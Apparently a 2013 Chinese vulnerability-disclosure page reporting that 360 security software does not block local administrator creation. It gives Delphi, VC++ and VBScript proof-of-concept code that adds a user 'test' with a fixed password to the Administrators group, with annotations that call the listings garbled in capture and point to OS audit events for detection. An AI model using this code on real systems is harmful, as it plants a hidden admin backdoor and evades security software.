2013-04-25: 细节已通知厂商并且等待厂商处理中 2013-04-25: 厂商已经确认,细节仅向厂商公开 2013-04-28: 细节向第三方安全合作伙伴开放 2013-06-19: 细节向核心白帽子及相关领域专家公开 2013-06-29: 细节向普通白帽子公开 2013-07-09: 细节向实习白帽子公开 2013-07-24: 细节向公众公开
绕过360拦截添加用户!
delphi:
// Proof-of-concept from the report: writes an ADSI (WinNT://) script to x.vbs,
// launches it with ShellExecute, shows the created credentials in a message box,
// then deletes x.vbs. The script body creates local user "test" and adds it to
// the Administrators group.
// NOTE(review): this listing was collapsed onto one line when the page was
// captured — `beginassignfile` is `begin` fused with `assignfile`, and the
// `//winexec(...)` comment swallows everything after it (ShellExecute,
// MessageBox, deletefile, end;). It is not compilable as printed.
// Defender view: the observable effect is a local account creation plus a
// local-group membership change, which Windows audits at the OS level
// (Security log events 4720 and 4732 when account-management auditing is
// enabled) independently of whether a third-party product hooks the file write
// or the script host. That audit trail, not the x.vbs drop, is the reliable
// detection point.
var f:textfile; beginassignfile(f,'x.vbs');rewrite(f);writeln(f,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")');writeln(f,'os="WinNT://"&wsnetwork.ComputerName');writeln(f,'Set ob=GetObject(os)');writeln(f,'Set oe=GetObject(os&"/Administrators,group")');writeln(f,'Set od=ob.Create("user","test")');writeln(f,'od.SetPassword "gaimima"');writeln(f,'od.SetInfo');writeln(f,'Set of=GetObject(os&"/test",user)');writeln(f,'oe.add os&"/test" ');closefile(f);//winexec('x.vbs', SW_HIDE);ShellExecute(0,'open','x.vbs',nil,nil,sw_show);application.MessageBox('user:test'+#13#10+'pass:gaimima','提示!',0);deletefile('x.vbs');end;
VC:
// Proof-of-concept from the report, same effect as the Delphi/VBS variant but
// with no script file: fills a USER_INFO_1 from the dialog fields (A2W
// conversions of m_netuser / m_netpass), calls NetUserAdd, then
// NetLocalGroupAddMembers with a LOCALGROUP_MEMBERS_INFO_3 to put the new
// account into the local group named by m_admin, and logs to IDC_Log.
// NOTE(review): collapsed onto one line when captured — the first
// `//这个是要添加的用户名...` comment swallows every statement after it, so this
// is not compilable as printed. dwLevel is declared but the literal 1 is passed
// to NetUserAdd; dwError receives parm_err; neither Net* return value is
// checked, so "添加成功" is written to the dialog unconditionally.
// Defender view: these are ordinary Net* account-management APIs and the result
// (local account created, member added to a security-enabled local group) is
// audited by the OS regardless of any third-party interception of the call.
DWORD dwLevel = 1; USER_INFO_1 ui; DWORD dwError = 0; USES_CONVERSION; LPWSTR name = A2W(m_netuser); LPWSTR pwd = A2W(m_netpass); LPWSTR Administrators = A2W(m_admin); ui.usri1_name =(WCHAR * )name; //这个是要添加的用户名,可以自己改改 ui.usri1_password =(WCHAR * )pwd; //这个是用户密码,也可以自己改改 ui.usri1_priv = USER_PRIV_USER; ui.usri1_home_dir = NULL; //本地路劲 ui.usri1_comment =L"系统管理员";// 描述 ui.usri1_flags = UF_SCRIPT; ui.usri1_script_path = NULL; //登陆脚本 NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError); wchar_t szAccountName[100]={0}; wcscpy(szAccountName,ui.usri1_name); LOCALGROUP_MEMBERS_INFO_3 account; account.lgrmi3_domainandname=szAccountName; //添加到Administrators组 NetLocalGroupAddMembers(NULL,Administrators,3,(LPBYTE)&account,1); SetDlgItemText(IDC_Log,"添加成功.......");
不光 360,其他的安全类软件应该也拦截不到。貌似 MySQL、SQL Server 的添加用户也拦截不到。
' Proof-of-concept from the report: the script body that the Delphi listing
' above writes to x.vbs. It binds the local machine through the ADSI WinNT://
' provider, calls Create("user","test"), SetPassword and SetInfo, then adds the
' account to the Administrators group.
' NOTE(review): the original line breaks were collapsed into apostrophes when
' the page was captured, and the apostrophe is the VBScript comment marker — as
' printed, only the first statement (CreateObject("WSCRIPT.NETWORK")) is live
' code and the `');` after SetInfo is a paste artefact. The writeln calls in the
' Delphi listing show the intended line structure.
' Defender view: account creation through the WinNT:// ADSI provider ends in the
' same OS-level account-management audit events as the Net* API path; monitoring
' those events covers this variant without depending on script-host hooks.
set wsnetwork=CreateObject("WSCRIPT.NETWORK")'os="WinNT://"&wsnetwork.ComputerName'Set ob=GetObject(os)'Set oe=GetObject(os&"/Administrators,group")'Set od=ob.Create("user","test")'od.SetPassword "gaimima"'od.SetInfo');Set of=GetObject(os&"/test",user)'oe.add os&"/test" '
保存为 vbs 运行,360 无反应。
你们专业的
危害等级:低
漏洞Rank:3
确认时间:2013-04-25 18:14
感谢反馈,该问题已着手解决。
暂无